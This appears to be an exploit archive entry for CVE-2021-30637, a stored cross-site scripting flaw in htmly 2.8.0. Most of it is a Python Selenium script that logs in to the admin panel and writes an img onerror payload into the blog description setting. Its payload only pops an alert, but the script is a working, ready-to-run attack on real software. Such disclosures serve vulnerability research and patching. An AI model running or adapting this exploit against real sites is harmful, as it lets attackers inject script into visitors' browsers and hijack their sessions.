htmly 2.8.0 Exploit, 'description' Stored Cross-Site Scripting (XSS)

# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor Homepage: https://www.htmly.com/
# Software Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637

#!/usr/bin/python3

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"

#enter your login username
username="nu11secur1ty"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"


#browser = webdriver.Safari()	#for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome()	#uncomment this line,for chrome users
#browser = webdriver.Firefox()	#uncomment this line,for chrome users

browser.get((website_link))	

try:
	username_element = browser.find_element_by_name(element_for_username)
	username_element.send_keys(username)		
	password_element  = browser.find_element_by_name(element_for_password)
	password_element.send_keys(password)
	signInButton = browser.find_element_by_name(element_for_submit)
	signInButton.click()
	
	# Exploit .ini
	browser.get(("http://localhost/htmly/admin/config"))	
	browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'") 
	time.sleep(3)
	browser.execute_script("document.querySelector('.btn.btn-primary').click()")

	print("payload is deployed...\n")
	
except Exception:
	#### This exception occurs if the element are not found in the webpage.
	print("Some error occured :(")

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / ASPF / PHP 7.4 / NGINX / FreeBSD